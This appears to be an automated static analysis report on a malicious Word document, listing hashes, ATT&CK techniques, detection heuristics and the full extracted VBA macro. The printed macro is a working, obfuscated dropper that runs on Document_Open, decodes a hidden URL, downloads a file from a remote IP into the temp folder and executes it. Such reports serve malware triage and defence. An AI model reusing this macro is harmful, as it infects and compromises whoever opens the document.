Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 ea1a22ffedc2ce74…

MALICIOUS

Office (OLE)

Size: 125.0 KB
Created: 2018-10-14 21:20:00
Authoring application: Microsoft Office Word
First seen: 2019-05-31
MD5: 879353857379429d7768400e33a9e5c2
SHA-1: 35124244bfe4cf9d0539f7c2862a6b926589b4e8
SHA-256: ea1a22ffedc2ce74021ae25cce19f713457acc1e5f24b15d4dce65515c17becb
Risk Score: 258

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment
  • T1140 Deobfuscate/Decode Files or Information

The sample contains VBA macros that attempt to download and execute a payload, as indicated by the 'OLE_VBA_HTTP_DROP_EXEC' heuristic. The document body explicitly prompts the user to 'enable content' to view the document, a typical social engineering tactic. The VBA macro code is heavily obfuscated, making it difficult to determine the exact payload or destination URL, but the overall intent is to download and execute a secondary stage.

Heuristics 9

  • ClamAV: Doc.Downloader.Generic-6922941-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Generic-6922941-0
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXEC
    VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec and Shell paths, this is a download-and-drop dropper, even when the COM ProgIDs are built dynamically to evade keyword scanning.
    Matched line in script
    §¡³°·®¥¡°¶ª®´µ§£¹½·¥¨¨¨¦¯ª¦´««¢¨§«´ª¸·¤«²¥ª¢µ¦¦®®³¸¿²½°¾¦²¥§ª°¢¼³¹¼º¯¤£¹º¯¡¬¶¾³·¬¨¯µ² = ¥©¥½¢ª¡²´¢½¡®¸¶¡»¶¡¸¾´´¤¬µ®¦³¨²¦¤»µ³¡º¸©´¬©«¤£·««¥°£¿§µ¯£¦¬¶¼¼»¾µ°µ¨°¡¹»½¸¨²¤¬·¹ª·.responseBody
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set ¥©¥½¢ª¡²´¢½¡®¸¶¡»¶¡¸¾´´¤¬µ®¦³¨²¦¤»µ³¡º¸©´¬©«¤£·««¥°£¿§µ¯£¦¬¶¼¼»¾µ°µ¨°¡¹»½¸¨²¤¬·¹ª· = CreateObject("microsoft.xmlhttp")
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    ¼¼»¾µ°µ¨°¡¹»½¸¨²¤¬·¹ª·º®§¶½¶¢¾¤¤¼²¼´¶ª¶¼¹«¬°½£§©£¸¯¢©¤º·¦¥¾¥¢´£¯©©ª§·»¿³º¹¬ª¨®²»·£®¬¡¯«£ = Environ("tmp") + °¶ª®´µ§£¹½·¥¨¨¨¦¯ª¦´««¢¨§«´ª¸·¤«²¥ª¢µ¦¦®®³¸¿²½°¾¦²¥§ª°¢¼³¹¼º¯¤£¹º¯¡¬¶¾³·¬¨¯µ²³²µ¥("\ZQFMâG¶TØ.ÂÛÂ")
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main Referenced by macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 8659 bytes
SHA-256: 20bc4f5d23553c89ba474415df1a7f9fbccc3fbc9b7d54cb62c9ff07232ef186
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
    Public Function °¶ª®´µ§£¹½·¥¨¨¨¦¯ª¦´««¢¨§«´ª¸·¤«²¥ª¢µ¦¦®®³¸¿²½°¾¦²¥§ª°¢¼³¹¼º¯¤£¹º¯¡¬¶¾³·¬¨¯µ²³²µ¥(©¥½¢ª¡²´¢½¡®¸¶¡»¶¡¸¾´´¤¬µ®¦³¨²¦¤»µ³¡º¸©´¬©«¤£·««¥°£¿§µ¯£¦¬¶¼¼»¾µ°µ¨°¡¹»½¸¨²¤¬·¹ª·º)
        ¥¿§¸¸§¢¶©³©µ¿°¿¨¬¢«³§¡³°·®¥¡°¶ª®´µ§£¹½·¥¨¨¨¦¯ª¦´««¢¨§«´ª¸·¤«²¥ª¢µ¦¦®®³¸¿²½°¾¦²¥§ª°¢ = " ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ¿¡²³ÀÁÂÃÄÅÒÓÔÕÖÙÛÜàáâãä娶§Ú¥"
        ¼³¹¼º¯¤£¹º¯¡¬¶¾³·¬¨¯µ²³²µ¥©¥½¢ª¡²´¢½¡®¸¶¡»¶¡¸¾´´¤¬µ®¦³¨²¦¤»µ³¡º¸©´¬©«¤£·««¥°£¿§µ¯ = " ¿¡@#$%^&*()_+|01²³456789ÀbÁdÂÃghÄjklmÅÒÓqÔÕÖÙvwÛÜz.,-~AàáâãFGHäJKåMNضQR§TÚVWX¥Z?!23acefinoprstuxyBCDEILOPSUY"
        For i = 1 To Len(©¥½¢ª¡²´¢½¡®¸¶¡»¶¡¸¾´´¤¬µ®¦³¨²¦¤»µ³¡º¸©´¬©«¤£·««¥°£¿§µ¯£¦¬¶¼¼»¾µ°µ¨°¡¹»½¸¨²¤¬·¹ª·º)
            £¦¬¶¼¼»¾µ°µ¨°¡¹»½¸¨²¤¬·¹ª·º®§¶½¶¢¾¤¤¼²¼´¶ª¶¼¹«¬°½£§©£¸¯¢©¤º·¦¥¾¥¢´£¯©©ª§·»¿³º¹¬ª¨®²»·£® = InStr(¥¿§¸¸§¢¶©³©µ¿°¿¨¬¢«³§¡³°·®¥¡°¶ª®´µ§£¹½·¥¨¨¨¦¯ª¦´««¢¨§«´ª¸·¤«²¥ª¢µ¦¦®®³¸¿²½°¾¦²¥§ª°¢, Mid(©¥½¢ª¡²´¢½¡®¸¶¡»¶¡¸¾´´¤¬µ®¦³¨²¦¤»µ³¡º¸©´¬©«¤£·««¥°£¿§µ¯£¦¬¶¼¼»¾µ°µ¨°¡¹»½¸¨²¤¬·¹ª·º, i, 1))
            If £¦¬¶¼¼»¾µ°µ¨°¡¹»½¸¨²¤¬·¹ª·º®§¶½¶¢¾¤¤¼²¼´¶ª¶¼¹«¬°½£§©£¸¯¢©¤º·¦¥¾¥¢´£¯©©ª§·»¿³º¹¬ª¨®²»·£® > 0 Then
                ¬¡¯«£¥¿§¸¸§¢¶©³©µ¿°¿¨¬¢«³§¡³°·®¥¡°¶ª®´µ§£¹½·¥¨¨¨¦¯ª¦´««¢¨§«´ª¸·¤«²¥ª¢µ¦¦®®³¸¿²½°¾¦²¥§ª = Mid(¼³¹¼º¯¤£¹º¯¡¬¶¾³·¬¨¯µ²³²µ¥©¥½¢ª¡²´¢½¡®¸¶¡»¶¡¸¾´´¤¬µ®¦³¨²¦¤»µ³¡º¸©´¬©«¤£·««¥°£¿§µ¯, £¦¬¶¼¼»¾µ°µ¨°¡¹»½¸¨²¤¬·¹ª·º®§¶½¶¢¾¤¤¼²¼´¶ª¶¼¹«¬°½£§©£¸¯¢©¤º·¦¥¾¥¢´£¯©©ª§·»¿³º¹¬ª¨®²»·£®, 1)
                °¢¼³¹¼º¯¤£¹º¯¡¬¶¾³·¬¨¯µ²³²µ¥©¥½¢ª¡²´¢½¡®¸¶¡»¶¡¸¾´´¤¬µ®¦³¨²¦¤»µ³¡º¸©´¬©«¤£·««¥°£¿ = °¢¼³¹¼º¯¤£¹º¯¡¬¶¾³·¬¨¯µ²³²µ¥©¥½¢ª¡²´¢½¡®¸¶¡»¶¡¸¾´´¤¬µ®¦³¨²¦¤»µ³¡º¸©´¬©«¤£·««¥°£¿ + ¬¡¯«£¥¿§¸¸§¢¶©³©µ¿°¿¨¬¢«³§¡³°·®¥¡°¶ª®´µ§£¹½·¥¨¨¨¦¯ª¦´««¢¨§«´ª¸·¤«²¥ª¢µ¦¦®®³¸¿²½°¾¦²¥§ª
            Else
                °¢¼³¹¼º¯¤£¹º¯¡¬¶¾³·¬¨¯µ²³²µ¥©¥½¢ª¡²´¢½¡®¸¶¡»¶¡¸¾´´¤¬µ®¦³¨²¦¤»µ³¡º¸©´¬©«¤£·««¥°£¿ = °¢¼³¹¼º¯¤£¹º¯¡¬¶¾³·¬¨¯µ²³²µ¥©¥½¢ª¡²´¢½¡®¸¶¡»¶¡¸¾´´¤¬µ®¦³¨²¦¤»µ³¡º¸©´¬©«¤£·««¥°£¿ + Mid(©¥½¢ª¡²´¢½¡®¸¶¡»¶¡¸¾´´¤¬µ®¦³¨²¦¤»µ³¡º¸©´¬©«¤£·««¥°£¿§µ¯£¦¬¶¼¼»¾µ°µ¨°¡¹»½¸¨²¤¬·¹ª·º, i, 1)
            End If
        Next
        °¶ª®´µ§£¹½·¥¨¨¨¦¯ª¦´««¢¨§«´ª¸·¤«²¥ª¢µ¦¦®®³¸¿²½°¾¦²¥§ª°¢¼³¹¼º¯¤£¹º¯¡¬¶¾³·¬¨¯µ²³²µ¥ = °¢¼³¹¼º¯¤£¹º¯¡¬¶¾³·¬¨¯µ²³²µ¥©¥½¢ª¡²´¢½¡®¸¶¡»¶¡¸¾´´¤¬µ®¦³¨²¦¤»µ³¡º¸©´¬©«¤£·««¥°£¿
    End Function

Private Sub Document_Open()
Dim ¥©¥½¢ª¡²´¢½¡®¸¶¡»¶¡¸¾´´¤¬µ®¦³¨²¦¤»µ³¡º¸©´¬©«¤£·««¥°£¿§µ¯£¦¬¶¼¼»¾µ°µ¨°¡¹»½¸¨²¤¬·¹ª·
Set ¥©¥½¢ª¡²´¢½¡®¸¶¡»¶¡¸¾´´¤¬µ®¦³¨²¦¤»µ³¡º¸©´¬©«¤£·««¥°£¿§µ¯£¦¬¶¼¼»¾µ°µ¨°¡¹»½¸¨²¤¬·¹ª· = CreateObject("microsoft.xmlhttp")
Dim ¼¼»¾µ°µ¨°¡¹»½¸¨²¤¬·¹ª·º®§¶½¶¢¾¤¤¼²¼´¶ª¶¼¹«¬°½£§©£¸¯¢©¤º·¦¥¾¥¢´£¯©©ª§·»¿³º¹¬ª¨®²»·£®¬¡¯«£
Dim µ²³²µ¥©¥½¢ª¡²´¢½¡®¸¶¡»¶¡¸¾´´¤¬µ®¦³¨²¦¤»µ³¡º¸©´¬©«¤£·««¥°£¿§µ¯£¦¬¶¼¼»¾µ°µ¨°¡¹»½¸¨²¤¬·¹ª·
Set µ²³²µ¥©¥½¢ª¡²´¢½¡®¸¶¡»¶¡¸¾´´¤¬µ®¦³¨²¦¤»µ³¡º¸©´¬©«¤£·««¥°£¿§µ¯£¦¬¶¼¼»¾µ°µ¨°¡¹»½¸¨²¤¬·¹ª· = CreateObject("Shell.Application")

¼¼»¾µ°µ¨°¡¹»½¸¨²¤¬·¹ª·º®§¶½¶¢¾¤¤¼²¼´¶ª¶¼¹«¬°½£§©£¸¯¢©¤º·¦¥¾¥¢´£¯©©ª§·»¿³º¹¬ª¨®²»·£®¬¡¯«£ = Environ("tmp") + °¶ª®´µ§£¹½·¥¨¨¨¦¯ª¦´««¢¨§«´ª¸·¤«²¥ª¢µ¦¦®®³¸¿²½°¾¦²¥§ª°¢¼³¹¼º¯¤£¹º¯¡¬¶¾³·¬¨¯µ²³²µ¥("\ZQFMâG¶TØ.ÂÛÂ")
¥©¥½¢ª¡²´¢½¡®¸¶¡»¶¡¸¾´´¤¬µ®¦³¨²¦¤»µ³¡º¸©´¬©«¤£·««¥°£¿§µ¯£¦¬¶¼¼»¾µ°µ¨°¡¹»½¸¨²¤¬·¹ª·.Open "GET", °¶ª®´µ§£¹½·¥¨¨¨¦¯ª¦´««¢¨§«´ª¸·¤«²¥ª¢µ¦¦®®³¸¿²½°¾¦²¥§ª°¢¼³¹¼º¯¤£¹º¯¡¬¶¾³·¬¨¯µ²³²µ¥("hÖÖÓ://²00.6³.45.1²9/ÕÜÕÖÂm/âFF§ÅÒ_ÒÙÖÓÙÖ8â44à1F.ÂÛÂ"), False
¥©¥½¢ª¡²´¢½¡®¸¶¡»¶¡¸¾´´¤¬µ®¦³¨²¦¤»µ³¡º¸©´¬©«¤£·««¥°£¿§µ¯£¦¬¶¼¼»¾µ°µ¨°¡¹»½¸¨²¤¬·¹ª·.send
§¡³°·®¥¡°¶ª®´µ§£¹½·¥¨¨¨¦¯ª¦´««¢¨§«´ª¸·¤«²¥ª¢µ¦¦®®³¸¿²½°¾¦²¥§ª°¢¼³¹¼º¯¤£¹º¯¡¬¶¾³·¬¨¯µ² = ¥©¥½¢ª¡²´¢½¡®¸¶¡»¶¡¸¾´´¤¬µ®¦³¨²¦¤»µ³¡º¸©´¬©«¤£·««¥°£¿§µ¯£¦¬¶¼¼»¾µ°µ¨°¡¹»½¸¨²¤¬·¹ª·.responseBody
If ¥©¥½¢ª¡²´¢½¡®¸¶¡»¶¡¸¾´´¤¬µ®¦³¨²¦¤»µ³¡º¸©´¬©«¤£·««¥°£¿§µ¯£¦¬¶¼¼»¾µ°µ¨°¡¹»½¸¨²¤¬·¹ª·.Status = 200 Then
Set ²¼´¶ª¶¼¹«¬°½£§©£¸¯¢©¤º·¦¥¾¥¢´£¯©©ª§·»¿³º¹¬ª¨®²»·£®¬¡¯«£¥¿§¸¸§¢¶©³©µ¿°¿¨¬¢«³§¡³°·®¥¡°¶ª®´ = CreateObject("adodb.stream")
²¼´¶ª¶¼¹«¬°½£§©£¸¯¢©¤º·¦¥¾¥¢´£¯©©ª§·»¿³º¹¬ª¨®²»·£®¬¡¯«£¥¿§¸¸§¢¶©³©µ¿°¿¨¬¢«³§¡³°·®¥¡°¶ª®´.Open
²¼´¶ª¶¼¹«¬°½£§©£¸¯¢©¤º·¦¥¾¥¢´£¯©©ª§·»¿³º¹¬ª¨®²»·£®¬¡¯«£¥¿§¸¸§¢¶©³©µ¿°¿¨¬¢«³§¡³°·®¥¡°¶ª®´.Type = 1
²¼´¶ª¶¼¹«¬°½£§©£¸¯¢©¤º·¦¥¾¥¢´£¯©©ª§·»¿³º¹¬ª¨®²»·£®¬¡¯«£¥¿§¸¸§¢¶©³©µ¿°¿¨¬¢«³§¡³°·®¥¡°¶ª®´.Write §¡³°·®¥¡°¶ª®´µ§£¹½·¥¨¨¨¦¯ª¦´««¢¨§«´ª¸·¤«²¥ª¢µ¦¦®®³¸¿²½°¾¦²¥§ª°¢¼³¹¼º¯¤£¹º¯¡¬¶¾³·¬¨¯µ²
²¼´¶ª¶¼¹«¬°½£§©£¸¯¢©¤º·¦¥¾¥¢´£¯©©ª§·»¿³º¹¬ª¨®²»·£®¬¡¯«£¥¿§¸¸§¢¶©³©µ¿°¿¨¬¢«³§¡³°·®¥¡°¶ª®´.SaveToFile ¼¼»¾µ°µ¨°¡¹»½¸¨²¤¬·¹ª·º®§¶½¶¢¾¤¤¼²¼´¶ª¶¼¹«¬°½£§©£¸¯¢©¤º·¦¥¾¥¢´£¯©©ª§·»¿³º¹¬ª¨®²»·£®¬¡¯«£, 2
²¼´¶ª¶¼¹«¬°½£§©£¸¯¢©¤º·¦¥¾¥¢´£¯©©ª§·»¿³º¹¬ª¨®²»·£®¬¡¯«£¥¿§¸¸§¢¶©³©µ¿°¿¨¬¢«³§¡³°·®¥¡°¶ª®´.Close
End If
µ²³²µ¥©¥½¢ª¡²´¢½¡®¸¶¡»¶¡¸¾´´¤¬µ®¦³¨²¦¤»µ³¡º¸©´¬©«¤£·««¥°£¿§µ¯£¦¬¶¼¼»¾µ°µ¨°¡¹»½¸¨²¤¬·¹ª·.Open (¼¼»¾µ°µ¨°¡¹»½¸¨²¤¬·¹ª·º®§¶½¶¢¾¤¤¼²¼´¶ª¶¼¹«¬°½£§©£¸¯¢©¤º·¦¥¾¥¢´£¯©©ª§·»¿³º¹¬ª¨®²»·£®¬¡¯«£)


End Sub

Attribute VB_Name = "NewMacros"
Sub dfafOrigin()
'
' dfafOrigin Macro
'
'

End Sub